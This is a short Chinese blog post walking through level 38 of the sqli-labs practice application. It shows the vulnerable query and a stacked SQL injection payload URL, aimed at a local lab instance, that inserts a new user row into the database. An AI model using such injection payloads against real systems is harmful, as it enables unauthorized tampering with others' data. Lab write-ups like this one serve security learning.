Sqli-labs less 38

Less-38

学习了关于stacked injection的相关知识,我们在本关可以得到直接的运用。

在执行select时的sql语句为:SELECT * FROM users WHERE id='$id' LIMIT 0,1

可以直接构造如下的payload:

http://127.0.0.1/sqli-labs/Less-38/index.php?id=1%27;insert%20into%20users(id,username,password)%20values%20(%2738%27,%27less38%27,%27hello%27)--+

再看数据表中的内容:可以看到less38已经添加。

posted @ 2016-08-11 22:00  lcamry  阅读(999)  评论(0编辑  收藏  举报